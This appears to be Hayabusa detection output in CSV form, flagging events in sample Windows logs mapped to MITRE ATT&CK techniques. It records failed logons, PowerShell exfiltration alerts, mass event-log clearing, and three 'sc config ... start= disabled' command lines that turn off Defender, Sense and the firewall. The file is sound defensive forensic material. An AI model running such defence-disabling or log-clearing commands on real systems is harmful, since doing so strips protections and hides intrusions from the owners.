2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
